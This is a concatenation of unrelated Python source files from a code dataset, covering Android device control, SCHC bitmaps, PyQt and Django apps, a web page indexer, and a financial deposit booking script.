self.device.get_sdk_version() < 24: # MM and below\n common_path = commonprefix(file_list, sep=self.device.path.sep)\n self.broadcast_media_mounted(common_path, self.device.is_rooted)\n else:\n for f in file_list:\n self.broadcast_media_scan_file(f)\n\n def broadcast_media_scan_file(self, filepath):\n \"\"\"\n Force a re-index of the mediaserver cache for the specified file.\n \"\"\"\n command = 'am broadcast -a android.intent.action.MEDIA_SCANNER_SCAN_FILE -d file://'\n self.execute(command + filepath)\n\n def broadcast_media_mounted(self, dirpath, as_root=False):\n \"\"\"\n Force a re-index of the mediaserver cache for the specified directory.\n \"\"\"\n command = 'am broadcast -a android.intent.action.MEDIA_MOUNTED -d file://'\n self.execute(command + dirpath, as_root=as_root)\n\n # Internal methods: do not use outside of the class.\n def _update_build_properties(self, props):\n try:\n regex = re.compile(r'\\[([^\\]]+)\\]\\s*:\\s*\\[([^\\]]+)\\]')\n for match in regex.finditer(self.execute(\"getprop\")):\n key = match.group(1).strip()\n value = match.group(2).strip()\n props[key] = value\n except ValueError:\n self.logger.warning('Could not parse build.prop.')\n\n def _update_versions(self, filepath, props):\n with open(filepath) as fh:\n text = fh.read()\n props['version'] = text\n text = re.sub(r'#.*', '', text).strip()\n match = re.search(r'^(Linux version .*?)\\s*\\((gcc version .*)\\)$', text)\n if match:\n props['linux_version'] = match.group(1).strip()\n props['gcc_version'] = match.group(2).strip()\n else:\n self.logger.warning('Could not parse version string.')\n\n def _ensure_binaries_directory_is_writable(self):\n matched = []\n for entry in self.list_file_systems():\n if self.binaries_directory.rstrip('/').startswith(entry.mount_point):\n matched.append(entry)\n if matched:\n entry = sorted(matched, key=lambda x: len(x.mount_point))[-1]\n if 'rw' not in entry.options:\n self.execute('mount -o rw,remount {} {}'.format(entry.device, entry.mount_point), as_root=True)\n else:\n raise DeviceError('Could not find mount point for binaries directory {}'.format(self.binaries_directory))\n\n\nclass _LogcatPoller(threading.Thread):\n\n join_timeout = 5\n\n def __init__(self, device, period, timeout=None):\n super(_LogcatPoller, self).__init__()\n self.adb_device = device.adb_name\n self.logger = device.logger\n self.period = period\n self.timeout = timeout\n self.stop_signal = threading.Event()\n self.lock = threading.RLock()\n self.buffer_file = tempfile.mktemp()\n self.last_poll = 0\n self.daemon = True\n self.exc = None\n\n def run(self):\n self.logger.debug('Starting logcat polling.')\n try:\n while True:\n if self.stop_signal.is_set():\n break\n with self.lock:\n current_time = time.time()\n if (current_time - self.last_poll) >= self.period:\n self._poll()\n time.sleep(0.5)\n except Exception: # pylint: disable=W0703\n self.exc = WorkerThreadError(self.name, sys.exc_info())\n self.logger.debug('Logcat polling stopped.')\n\n def stop(self):\n self.logger.debug('Stopping logcat polling.')\n self.stop_signal.set()\n self.join(self.join_timeout)\n if self.is_alive():\n self.logger.error('Could not join logcat poller thread.')\n if self.exc:\n raise self.exc # pylint: disable=E0702\n\n def clear_buffer(self):\n self.logger.debug('Clearing logcat buffer.')\n with self.lock:\n adb_shell(self.adb_device, 'logcat -c', timeout=self.timeout)\n with open(self.buffer_file, 'w') as _: # NOQA\n pass\n\n def write_log(self, outfile):\n self.logger.debug('Writing logbuffer to {}.'.format(outfile))\n with self.lock:\n self._poll()\n if os.path.isfile(self.buffer_file):\n shutil.copy(self.buffer_file, outfile)\n else: # there was no logcat trace at this time\n with open(outfile, 'w') as _: # NOQA\n pass\n\n def close(self):\n self.logger.debug('Closing logcat poller.')\n if os.path.isfile(self.buffer_file):\n os.remove(self.buffer_file)\n\n def _poll(self):\n with self.lock:\n self.last_poll = time.time()\n adb_command(self.adb_device, 'logcat -d >> {}'.format(self.buffer_file), timeout=self.timeout)\n adb_command(self.adb_device, 'logcat -c', timeout=self.timeout)\n\n\nclass BigLittleDevice(AndroidDevice): # pylint: disable=W0223\n\n parameters = [\n Parameter('scheduler', default='hmp', override=True),\n ]\n","sub_path":"wlauto/common/android/device.py","file_name":"device.py","file_ext":"py","file_size_in_byte":35720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"51264981","text":"#---------------------------------------------------------------------------\n\nfrom base_import import *\n\nimport schcmsg\n\n#---------------------------------------------------------------------------\n\nall1 = lambda N: (1< 0:\n bl.append(0)\n tni -= 1\n if nbt == 1:\n bl.append(1)\n break\n # regular\n if wni < wn:\n #print(\"MBL00 wn:tn:nb=\", wni, tni, bl)\n while wni < wn:\n bl = bit_list.setdefault(wni, [])\n while tni > 0:\n bl.append(0)\n tni -= 1\n bl.append(0)\n wni += 1\n tni = max_fcn\n #print(\"MBL01 wn:tn:nb=\", wni, tni, bl)\n #print(\"MBL1 nb=\", nbt)\n assert wni == wn\n bl = bit_list.setdefault(wni, [])\n while tni > tn:\n bl.append(0)\n tni -= 1\n #print(\"MBL2 wn:tn:nb=\", wni, tni, bl)\n for _ in range(nbt):\n bl.append(1)\n if tni == 0:\n #print(\"MBL3 wn:tn:nb=\", wni, tni, bl)\n wni += 1\n bl = bit_list.setdefault(wni, [])\n tni = max_fcn\n else:\n #print(\"MBL4 wn:tn:nb=\", wni, tni, bl)\n tni -= 1\n return bit_list\n\n#---------------------------------------------------------------------------\n\ndef find_missing_tiles(tile_list, N, window_size):\n \"\"\" find missing tiles in the tile_list.\n return the set of bitmaps for each window in which any tiles are missing.\n the bitmap is tranformed into BitBuffer like below.\n [\n (0, BitBuffer([1, 1, 1, 1, 1, 1, 0])),\n (2, BitBuffer([1, l, l, 0, 0, 0, 1])),\n ]\n In this example, the bitmap will be \"1110001\".\n \"\"\"\n bit_list = make_bit_list(tile_list, N, window_size)\n ret = []\n for i in sorted(bit_list.items()):\n if not all(i[1]):\n ret.append((i[0], BitBuffer(i[1])))\n return ret\n\n#---------------------------------------------------------------------------\n","sub_path":"schcbitmap.py","file_name":"schcbitmap.py","file_ext":"py","file_size_in_byte":3678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"523899714","text":"class Solution(object):\n def lengthOfLongestSubstring(self, s):\n \"\"\"\n :type s: str\n :rtype: int\n \"\"\"\n start = 0\n visited = dict()\n maxlen = 0\n\n for i, c in enumerate(s):\n if visited.get(c, -1) >= start:\n curlen = i - start\n if curlen > maxlen:\n maxlen = curlen\n start = visited[c] + 1\n visited[c] = i\n\n if len(s) - start > maxlen:\n maxlen = len(s) - start\n\n return maxlen\n","sub_path":"Python/003_LongestSubstringWithoutRepeatingCharacters/Oct26.py","file_name":"Oct26.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"462249718","text":"from assignment_1.tiger_corpus_reader import TigerCorpusReader\nfrom assignment_3.max_ent_tagger import MaxEntTagger\n\nimport os\nimport pickle\n\n\nDATA_DIR = 'C:\\\\Users\\\\ttanj\\\\PycharmProjects\\\\SNLP\\\\data'\nCORPUS_NAME = 'tiger_release_dec05.xml'\n\nalpha = 0.05\nbatch_size = 100\nepochs = 10\n\nif os.path.exists(os.path.join(DATA_DIR, 'tiger_release_dec05')):\n with open(os.path.join(DATA_DIR, 'tiger_release_dec05'), 'rb') as fh:\n corpus = pickle.load(fh)\n reader = TigerCorpusReader(corpus)\nelse:\n reader = TigerCorpusReader()\n reader.read(os.path.join(DATA_DIR, CORPUS_NAME))\n\ntrain = reader.get_sentences(0, 44999)\ndev = reader.get_sentences(45000, 45010)\n\ntagger = MaxEntTagger()\ntagger.train(train, dev, alpha, batch_size, epochs)\n","sub_path":"assignment_3/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"181584793","text":"from PyQt5.QtWidgets import (QApplication, QMenu, QColorDialog, QGridLayout, QVBoxLayout, QHBoxLayout, QDialog, QLabel,\n QLineEdit, QPushButton, QWidget, QRadioButton, QSpinBox, QCheckBox, QButtonGroup,QTabWidget,\n QErrorMessage,QMenuBar)\nfrom PyQt5.QtCore import (Qt)\nimport sys,os, json\n\nconfig_file = 'dataAcc_config.json'\n\nclass BasicInstance:\n def __init__(self,name='',data={'':''}):\n self.name = name\n self.data = data\n self.ui = self.Widget(data=self)\n\n class Widget(QWidget):\n def __init__(self,data=None,patent=None):\n super().__init__()\n self.data = data\n self.setLayout(QHBoxLayout())\n self.drawUI()\n\n def drawUI(self):\n print('draw')\n layout = self.layout()\n self.label_btn = QPushButton(self.data.name)\n self.label_btn.setMaximumWidth(60)\n self.label_btn.setMaximumWidth(60)\n self.label_btn.clicked.connect(lambda :self.ChangeInstance(parent=self))\n layout.addWidget(self.label_btn)\n\n for key, val in sorted(self.data.data.items()):\n lbl = QLabel(key)\n lbl.setAlignment(Qt.AlignCenter)\n lbl.setMaximumWidth(20)\n lbl.setMinimumWidth(20)\n layout.addWidget(lbl)\n l = QLineEdit(val)\n l.editingFinished.connect(self.dataChanged)\n l.setMaximumWidth(40)\n l.setMinimumWidth(40)\n layout.addWidget(l)\n layout.setAlignment(Qt.AlignLeft)\n # layout.addStretch(1)\n # self.setLayout(layout)\n # self.show()\n\n class ChangeInstance(QDialog):\n def __init__(self, parent=None):\n self.parent = parent\n super().__init__(parent)\n self.setLayout(QVBoxLayout())\n self.initUI()\n self.show()\n\n def initUI(self):\n layout = self.layout()\n self.name = QLineEdit(self.parent.data.name)\n layout.addWidget(self.name)\n self.keys = QLineEdit(' '.join(self.parent.data.data))\n layout.addWidget(self.keys)\n self.OkBtn = QPushButton('Ok')\n self.OkBtn.clicked.connect(self.okBtnPressed)\n layout.addWidget(self.OkBtn)\n # self.setLayout(layout)\n\n def okBtnPressed(self):\n print('okBtnPressed')\n self.parent.data.name = self.name.text()\n self.parent.data.data = {key:self.parent.data.data.get(key,'') for key in self.keys.text().strip().split()}\n self.parent.smthChanged()\n self.close()\n\n def smthChanged(self):\n # print('labelBtnClicked')\n # self.ChangeInstance(parent=self)\n while self.layout().count():\n item = self.layout().takeAt(0)\n item.widget().deleteLater()\n self.drawUI()\n self.parent().saveConfig()\n\n def dataChanged(self):\n layout = self.layout()\n i = layout.indexOf(self.sender())\n key = sorted(self.data.data)[i//2-1]\n print(key,self.sender().text())\n self.data.data[key]=self.sender().text()\n self.parent().saveConfig()\n\nclass DataPage(QWidget):\n def __init__(self,name,data,parent=None):\n self.parent = parent\n self.name = name\n self.data=[]\n for key in data:\n self.data.append(BasicInstance(name=key,data=data[key]))\n super().__init__()\n self.setLayout(QGridLayout())\n self.drawUI()\n self.show()\n\n def drawUI(self):\n # clear layout for further dwawing\n layout = self.layout()\n while layout.count():\n item = layout.takeAt(0)\n item.widget().deleteLater()\n for i,item in enumerate(self.data):\n print(i, item.name)\n layout.addWidget(item.Widget(data=item),i,0)\n delBtn = QPushButton('Del')\n delBtn.pressed.connect(self.delSubEntry)\n layout.addWidget(delBtn,i,1)\n addBtn = QPushButton('Add')\n addBtn.pressed.connect(self.addBtnPressed)\n layout.addWidget(addBtn,len(self.data),0)\n w = QWidget()\n w.setLayout(QVBoxLayout())\n w.layout().addStretch(1)\n layout.addWidget(w, len(self.data)+1, 0)\n\n def delSubEntry(self):\n print('delSubEntry')\n layout = self.layout()\n i = layout.indexOf(self.sender())//2\n # layout = self.layout()\n # item = layout.takeAt(2*i)\n # item.widget().deleteLater()\n # item = layout.takeAt(2*i)\n # item.widget().deleteLater()\n del self.data[i]\n self.drawUI()\n self.saveConfig()\n\n def saveConfig(self):\n # print(self.parent())\n self.parent.saveConfig()\n\n def addBtnPressed(self):\n print('addBtnPressed')\n self.data.append(BasicInstance())\n self.drawUI()\n\n def getDataToConfig(self):\n d = {}\n for item in self.data:\n d[item.name]=item.data\n return {self.name:d}\n\nclass DataAccumulator(QTabWidget):\n def __init__(self):\n self.pages = []\n self.load()\n # self.data = {'mag':{'HH':{'I':'12'},'AHH':{'B':'4'},'gf':{'I':'10'}}}\n super().__init__()\n self.initUI()\n\n def load(self):\n if not os.path.exists(config_file):\n print('create folder ', config_file)\n self.data = {}\n with open(config_file, 'w') as f:\n json.dump(self.data, f)\n else:\n with open(config_file, 'r') as f:\n print('config_load')\n self.data = json.load(f)\n\n def saveConfig(self):\n print('saveConfig')\n d = {}\n for i in range(self.count()):\n d.update(self.widget(i).getDataToConfig())\n print(d)\n with open(config_file, 'w') as f:\n json.dump(d, f)\n\n\n def initUI(self):\n # menu_bar = QMenuBar()\n # new_page_menu = QMenu('Pages')\n # menu_bar.addMenu(new_page_menu)\n # new_page_menu.addAction('New page')\n # self.layout().setMenuBar(menu_bar)\n for key in self.data:\n new_page = DataPage(name=key,data=self.data[key],parent=self)\n self.addTab(new_page,key)\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n # ex = BasicInstance('new',{'1':'sdf'})\n ex = DataAccumulator()\n ex.show()\n sys.exit(app.exec_())","sub_path":"Thulium/dataAccumulator.py","file_name":"dataAccumulator.py","file_ext":"py","file_size_in_byte":6651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"357959435","text":"from .. import models \nfrom django.forms import ModelForm\nfrom django import forms\n#from django.forms.widgets import *\n#from django.forms.extras.widgets import *\n\n\nclass CalculationGroupsForm(ModelForm):\n class Meta:\n model = models.CalculationGroups\n exclude = (\"calc_group_id\", )\n \nclass ElementsForm(ModelForm): \n class Meta:\n model = models.Elements\n\nclass GeometriesForm(ModelForm):\n class Meta:\n model = models.Geometries\n exclude = (\"geom_id\")\n \nclass MolecularSpeciesForm(ModelForm):\n time_stamp = forms.DateTimeField(required=False)\n comments = forms.CharField(required=False)\n class Meta:\n model = models.MolecularSpecies\n exclude = (\"species_id\", )\n\n\n \nclass PartialMolecularSpeciesForm(ModelForm):\n class Meta:\n model = models.MolecularSpecies\n exclude = (\"species_id\", \"time_stamp\", \"qual_index\", )\n \nclass TheoryLevelsForm(ModelForm):\n description = forms.CharField()\n time_stamp = forms.DateTimeField(required=False)\n comments = forms.CharField(required=False)\n xc_description = forms.CharField(required=False, widget=forms.TextInput(attrs={'size':'40'}))\n bibliographies = forms.ModelMultipleChoiceField(queryset=models.Bibliography.alive_objects.all(), required = False)\n class Meta:\n model = models.TheoryLevels\n exclude = (\"thlevel_id\", )\n \nclass ChemistryCodesForm(ModelForm):\n description = forms.CharField(required=False)\n time_stamp = forms.DateTimeField(required=False)\n comments = forms.CharField(required=False)\n bibliographies = forms.ModelMultipleChoiceField(queryset=models.Bibliography.alive_objects.all(), required = False)\n class Meta:\n model = models.ChemistryCodes\n exclude = (\"code_id\", )\n \n\nclass CalculationsForm(ModelForm):\n input_md5 = forms.CharField(required = False, widget=forms.TextInput(attrs={'size':'40'}))\n output_md5 = forms.CharField(required = False, widget=forms.TextInput(attrs={'size':'40'}))\n other_output_md5 = forms.CharField(required = False, widget=forms.TextInput(attrs={'size':'40'}))\n time_stamp = forms.DateTimeField(required=False)\n comments = forms.CharField(required=False)\n class Meta:\n model = models.Calculations\n exclude = (\"calc_id\", \"code\",)\n \n \nclass BasisSetsForm(ModelForm):\n name = forms.CharField(required=False) #REMOVE required=False\n description = forms.CharField(required=False)\n time_stamp = forms.DateTimeField(required=False)\n comments = forms.CharField(required=False)\n bibliographies = forms.ModelMultipleChoiceField(queryset=models.Bibliography.alive_objects.all(), required = False)\n class Meta:\n model = models.BasisSets\n exclude = (\"basisset_id\", )\n \nclass TasksForm(ModelForm):\n description = forms.CharField()\n comments = forms.CharField(required=False)\n class Meta:\n model = models.Tasks\n exclude = (\"task_id\", \"thlevel\", \"calc\", )\n \nclass ElectonicStatesForm(ModelForm):\n bibliographies = forms.ModelMultipleChoiceField(queryset=models.Bibliography.alive_objects.all(), required = False)\n class Meta:\n model = models.ElectronicStates\n exclude = (\"state_id\", \"species\", \"geom\", \"task\", )\n \nclass DipoleMomentsForm(ModelForm):\n bibliographies = forms.ModelMultipleChoiceField(queryset=models.Bibliography.alive_objects.all(), required = False)\n class Meta:\n model = models.DipoleMoments\n exclude = (\"dip_id\", \"state\", \"task\", )\n \nclass ElementSpeciesForm(ModelForm):\n class Meta:\n model = models.ElementSpecies\n exclude = (\"elem_species_id\", \"element\", \"species\",)\n \nclass VibrationalAnalysesArmonicForm(ModelForm):\n polimode = forms.CharField(required=False)\n time_stamp = forms.DateTimeField(required=False)\n comments = forms.CharField(required=False)\n bibliographies = forms.ModelMultipleChoiceField(queryset=models.Bibliography.alive_objects.all(), required = False)\n class Meta:\n model = models.VibrationalAnalysesArmonic\n exclude = (\"vibalnalysis_id\", \"state\",\"task\",)\n\nclass RotationalConstantsForm(ModelForm):\n time_stamp = forms.DateTimeField(required=False)\n comments = forms.CharField(required=False)\n class Meta:\n model = models.RotationalConstants\n exclude = (\"rot_id\",\"state\",)\n\nclass TabulatedVibrationsForm(ModelForm):\n sym_type = forms.CharField(required=False)\n eigenvectors = forms.CharField(required=False)\n class Meta:\n model = models.TabulatedVibrations\n exclude = (\"vib_id\", \"vibanalysis_armonic\",)\n","sub_path":"oacagliari/qchitool/modelforms/modelforms (copia).py","file_name":"modelforms (copia).py","file_ext":"py","file_size_in_byte":4673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"72720336","text":"import xml.etree.ElementTree as ET\nimport re\n\nclass BaseLabelExtractor:\n def __init__(self, *args, **kwargs):\n pass\n\n def get_labels(self, data):\n ans = []\n for f in data:\n ans.append(self.extract_label(f))\n return ans\n\nclass ProblemExtractor(BaseLabelExtractor):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n def extract_label(self, item):\n r = r'(.+)-(.+)-(\\d+).*'\n m = re.search(r, item)\n return m.group(2)\n\nclass VerdictExtractor(BaseLabelExtractor):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.xml = kwargs.get(\"xml\", \"\")\n self.root = ET.parse(self.xml).getroot()\n self.teams = {}\n for session in self.root[0][1:]:\n #print(session.attrib['alias'])\n tasks = []\n for problem in session:\n task = []\n for solution in problem:\n task.append(solution.attrib['accepted']) \n tasks.append(task)\n self.teams[session.attrib[\"alias\"]] = tasks \n\n\n def extract_label(self, item):\n r = r'(.+)-(.+)-(\\d+)\\..*'\n m = re.search(r, item)\n print(item)\n print(m.group(1))\n print(m.group(2))\n print(m.group(3))\n print(self.teams[m.group(1)])\n print(self.teams[m.group(1)][ord(m.group(2))-ord('a')])\n print(self.teams[m.group(1)][ord(m.group(2))-ord('a')][int(m.group(3)) - 1])\n print('-'*40)\n return self.teams[m.group(1)][ord(m.group(2))-ord('a')][int(m.group(3)) - 1]","sub_path":"label_extractor.py","file_name":"label_extractor.py","file_ext":"py","file_size_in_byte":1625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"289312524","text":"import requests\nfrom envparse import env\nfrom urllib import request, parse\nfrom textblob import TextBlob, blob, Word\nfrom bs4 import BeautifulSoup as soup\nimport MySQLdb\nimport random\n\n\ndef indexUrl():\n # Connect to MySQL DB\n env.read_envfile()\n db = MySQLdb.connect(env.str(\"db_ip\"), env.str(\"db_user\"), env.str(\"db_pass\"), env.str(\"db_schema\"))\n connect = db.cursor()\n\n # Set target url\n connect.execute(\"SELECT address FROM crawled_urls WHERE parsed=1 ORDER BY id ASC LIMIT 1;\")\n results = connect.fetchone()\n target = results[0]\n updateUrl = \"UPDATE crawled_urls SET parsed = 2 WHERE address = '\" + target + \"';\"\n\n # Check for HTTP errors\n try:\n response = requests.get(target)\n except requests.exceptions.ConnectionError as e:\n connect.execute(updateUrl)\n\n # Get page\n site = None\n parsed = None\n try:\n site = request.urlopen(target).read()\n parsed = soup(site, 'html.parser')\n except:\n connect.execute(updateUrl)\n\n # Clean up HTML\n try:\n for tag in parsed.find_all(['script', 'style']):\n tag.replaceWith('')\n clean = parsed.get_text()\n blobText = TextBlob(clean)\n except:\n connect.execute(updateUrl)\n\n # Get NOUNS from text\n words = list()\n keyWords = ''\n try:\n for word, tag in blobText.tags:\n if tag == 'NN':\n words.append(word.lemmatize())\n except:\n connect.execute(updateUrl)\n try:\n for item in random.sample(words, 20):\n word = Word(item)\n if \"'\" not in word:\n keyWords = keyWords + ' ' + word.singularize()\n try:\n # Insert page into database\n insertSite = \"INSERT INTO indexed_urls(address, title, keywords) VALUES ('\" + target + \"','\" + parsed.title.string + \"','\" + keyWords + \"');\"\n connect.execute(insertSite)\n print(\"Done - \" + target)\n except:\n print(\"Error in gathered data on page - \" + target)\n except:\n print(\"Not enough data\")\n connect.execute(updateUrl)\n\n # Set URL to indexed and close connections\n connect.execute(updateUrl)\n db.commit()\n connect.close()\n db.close()\n\n # Back at it again\n indexUrl()\n\nindexUrl()\n\n","sub_path":"indexer.py","file_name":"indexer.py","file_ext":"py","file_size_in_byte":2282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"315318016","text":"import json\nimport os\nimport subprocess\nimport time\n\nfrom django.test import Client\nfrom mock import patch\n\nfrom questionnaire.models import Questionnaire, Section\nfrom questionnaire.tests.base_test import BaseTest\n\n\nclass ExportSectionToPDFViewTest(BaseTest):\n def setUp(self):\n self.client = Client()\n self.user = self.create_user(group=self.DATA_SUBMITTER, country=\"Uganda\", region=\"AFRO\")\n self.login_user()\n\n self.questionnaire = Questionnaire.objects.create(name=\"JRF 2013 Core English\",\n description=\"From dropbox as given by Rouslan\", year=2013)\n self.section_1 = Section.objects.create(title=\"Reported Cases of Selected Vaccine Preventable Diseases (VPDs)\",\n order=1,\n questionnaire=self.questionnaire, name=\"Reported Cases\")\n\n def test_get(self):\n meta = {'HTTP_REFERER': 'http://', 'HTTP_HOST': 'somehost'}\n\n mock_time = '123'\n with patch.object(time, 'time', return_value=mock_time):\n with patch.object(subprocess, 'Popen') as mock_popen:\n response = self.client.get(\"/export-section/\", **meta)\n\n self.assertEqual(200, response.status_code)\n content = json.loads(response.content)\n self.assertEqual(1, len(content.keys()))\n self.assertEqual('filename', content.keys()[0])\n\n file_name = 'eJRF_export_%s.pdf' % mock_time\n export_file_name = 'export/' + file_name\n self.assertTrue(file_name, content['filename'])\n\n session_id = response.client.cookies['sessionid'].value\n url = (meta['HTTP_REFERER'] + '?printable=1')\n domain = meta['HTTP_HOST']\n phantomjs_script = 'questionnaire/static/js/export-section.js'\n command = [\"phantomjs\", phantomjs_script, url, export_file_name, session_id, domain, \"&> /dev/null &\"]\n\n mock_popen.assert_called_once_with(command)\n\n def test_login_required(self):\n self.assert_login_required('/export-section/')\n\n\nclass DownloadSectionPDFViewTest(BaseTest):\n def setUp(self):\n self.client = Client()\n self.user = self.create_user(group=self.DATA_SUBMITTER, country=\"Uganda\", region=\"WHO\")\n self.login_user()\n\n def test_get(self):\n filename = \"haha.pdf\"\n os.system(\"echo 'haha' > export/%s\" % filename)\n\n response = self.client.get('/export-section/%s' % filename)\n self.assertEqual('attachment; filename=%s' % filename, response.get('Content-Disposition'))\n self.assertFalse(os.path.isfile('export/' + filename))\n\n def test_login_required(self):\n self.assert_login_required('/export-section/hahaha.pdf')\n","sub_path":"questionnaire/tests/views/test_export_sections_to_pdf.py","file_name":"test_export_sections_to_pdf.py","file_ext":"py","file_size_in_byte":2754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"505512686","text":"import acm\nfrom at import addInfo\nfrom at_logging import getLogger\nfrom PS_Functions import get_pb_fund_counterparty\nfrom PB_Saxo_general import (\n get_alias_from_alias_or_cp,\n get_saxo_depo_portfolio,\n get_saxo_cp,\n )\n\nCALL_ACCNT_TMPL = \"%(curr)s/SAXO_%(alias)s_CallAcc\"\nCALL_IMARGIN_TMPL = \"%(curr)s/SAXO_%(alias)s_InitMarg\"\n\nDEPO_CALL_ACCOUNT_TYPE = \"CALL_ACCOUNT\"\nDEPO_MARGIN_ACCOUNT_TYPE = \"MARGIN_ACCOUNT\"\nDEPO_TYPES = (\n DEPO_CALL_ACCOUNT_TYPE,\n DEPO_MARGIN_ACCOUNT_TYPE,\n )\n\nLOGGER = getLogger(__name__)\n\n\ndef check_depos_existence(alias, currency, from_date):\n LOGGER.info(\"Checking depos...\")\n for depo_type in DEPO_TYPES:\n create_deposit(alias, currency, depo_type, from_date)\n\n\ndef get_account_name(alias, curr, depo_type):\n alias = get_alias_from_alias_or_cp(alias)\n if depo_type == \"CALL_ACCOUNT\":\n name_acc = \"CallAcc\"\n else:\n name_acc = \"InitMargin\"\n return curr + '/' + \"SAXO\" + \"_\" + alias + \"_\" + name_acc\n\n\ndef get_call_account_name(alias_or_cp, curr):\n alias = get_alias_from_alias_or_cp(alias_or_cp)\n return CALL_ACCNT_TMPL % {'curr':curr, 'alias':alias}\n\n \ndef get_imargin_account_name(alias_or_cp, curr):\n alias = get_alias_from_alias_or_cp(alias_or_cp)\n return CALL_IMARGIN_TMPL % {'curr':curr, 'alias':alias}\n\n\ndef get_call_account(alias_or_cp, curr):\n name = get_call_account_name(alias_or_cp, curr)\n return _get_ins(name)\n\n\ndef get_imargin_account(alias_or_cp, curr):\n name = get_imargin_account_name(alias_or_cp, curr)\n return _get_ins(name)\n\n\ndef _get_ins(name):\n ins = None\n try:\n ins = acm.FInstrument[name]\n if not ins:\n raise RuntimeError(\"Nonexisting instrument: '%s'\" % name)\n trades = _ins_trades(ins)\n if len(trades) != 2:\n raise RuntimeError(\"Call Account '%s' trades error. Excpected 2 trades, found %d\"\n % (name, len(trades)))\n except Exception:\n ins = None\n return ins\n\n\ndef _get_depo_name(alias, depo_type, curr):\n if depo_type == \"CALL_ACCOUNT\":\n return get_call_account_name(alias, curr)\n else:\n return get_imargin_account_name(alias, curr)\n\n\ndef _get_depo(alias, depo_type, curr):\n name = _get_depo_name(alias, depo_type, curr)\n return _get_ins(name)\n\n\ndef _ins_trades(instr):\n trades = [t for t in instr.Trades() if t.Status() not in ('Simulated', 'Void', 'Terminated')]\n return trades\n\n\ndef create_deposit(alias, currency, depo_type, from_date):\n\n name = _get_depo_name(alias, depo_type, currency)\n ins = acm.FInstrument[name]\n if ins:\n trds_size = len(_ins_trades(ins))\n if trds_size == 2:\n return ins\n elif trds_size > 0:\n raise RuntimeError(\"Invalid number of call account '%s' trades. Expected 2, found: %d\"\n % (ins.Name(), trds_size))\n\n # creating new deposits (4) and their trades here\n\n curr = acm.FCurrency[currency]\n cal = curr.Calendar()\n day_count_method = curr.Legs()[0].DayCountMethod()\n cparty = get_pb_fund_counterparty(alias)\n end_date = cal.AdjustBankingDays(from_date, 20)\n next_month = acm.Time.FirstDayOfMonth(acm.Time.DateAddDelta(from_date, 0, 1, 0))\n\n # can't use transaction while creating 2 trades in transaction\n # since validation rule would change one of the portfolios to Graveyard\n # acm.BeginTransaction()\n try:\n if not ins:\n \n LOGGER.info(\"Creating depo: '%s'\", name)\n \n ins = acm.FDeposit()\n ins.Name(name)\n ins.Currency(curr)\n ins.ContractSize(1)\n ins.DateFrom(from_date)\n ins.Otc(True)\n ins.OpenEnd('Open End')\n ins.PayOffsetMethod('Business Days')\n ins.PriceFindingChlItem(\n acm.FChoiceList.Select('list = \"PriceFindingGroup\" and name = \"Close\"')[0])\n ins.SpotBankingDaysOffset(0)\n ins.ShortDividendFactor(1)\n ins.ValuationGrpChlItem(\n acm.FChoiceList.Select('list = \"ValGroup\" and name = \"AC_GLOBAL_Funded\"')[0])\n ins.QuoteType('Clean')\n ins.Quotation('Clean')\n ins.OpenEnd('Open End')\n ins.ExpiryDate(end_date)\n ins.MinimumPiece(100000000)\n ins.RoundingSpecification('Rounding_FX_2Dec')\n\n\n\n leg = ins.CreateLeg(False)\n # leg = acm.FLeg()\n leg.PayCalendar(cal)\n leg.ResetCalendar(cal)\n leg.Currency(curr)\n leg.Decimals(11)\n leg.FloatRateFactor(1)\n leg.FixedRate(0)\n leg.NominalFactor(1)\n leg.FixedCoupon(True)\n leg.PayLeg(False)\n leg.DayCountMethod(day_count_method)\n leg.NominalAtEnd(True)\n leg.Rounding('Normal')\n leg.RollingPeriod(\"1m\")\n leg.EndPeriodUnit(\"Days\")\n leg.ResetDayOffset(0)\n leg.ResetType(\"Weighted\")\n leg.ResetPeriod(\"1d\")\n leg.ResetDayMethod(\"Following\")\n leg.RollingPeriodBase(next_month)\n leg.PayDayMethod(\"Following\")\n leg.Reinvest(True)\n\n leg.StartDate(from_date)\n leg.EndDate(end_date)\n leg.LegType('Call Fixed Adjustable')\n leg.StrikeType(\"Absolute\")\n\n ins.RegisterInStorage()\n leg.Instrument(ins)\n # leg.Commit()\n\n ins.Commit()\n\n\n addInfo.save(ins, \"CE Bankruptcy\", \"YES\")\n\n if not ins.Trades():\n\n LOGGER.info(\"Booking depo trades...\")\n \n trade = acm.FTrade()\n trade.Instrument(ins)\n trade.Portfolio(get_saxo_depo_portfolio())\n trade.Currency(curr)\n trade.Quantity(1)\n trade.Counterparty(get_saxo_cp())\n trade.Acquirer(acm.FInternalDepartment['PRIME SERVICES DESK'])\n trade.ValueDay(from_date)\n trade.AcquireDay(from_date)\n trade.TradeTime(from_date)\n trade.Status(\"BO Confirmed\")\n trade.Trader(acm.User())\n\n trade.RegisterInStorage()\n trade.AdditionalInfo().Funding_Instype(\"Call Prime Brokerage Funding\")\n trade.Commit()\n\n acc_name = get_account_name(alias, currency, depo_type)\n addInfo.save(trade, 'Account_Name', acc_name)\n\n trade2 = trade.Clone()\n trade2.Counterparty(cparty)\n trade2.ValueDay(from_date)\n trade2.AcquireDay(from_date)\n trade2.TradeTime(from_date)\n trade2.Quantity(-1)\n trade2.RegisterInStorage()\n trade2.AdditionalInfo().Funding_Instype(\"Call Prime Brokerage Funding\")\n trade2.Commit()\n addInfo.save(trade2, 'Account_Name', acc_name)\n 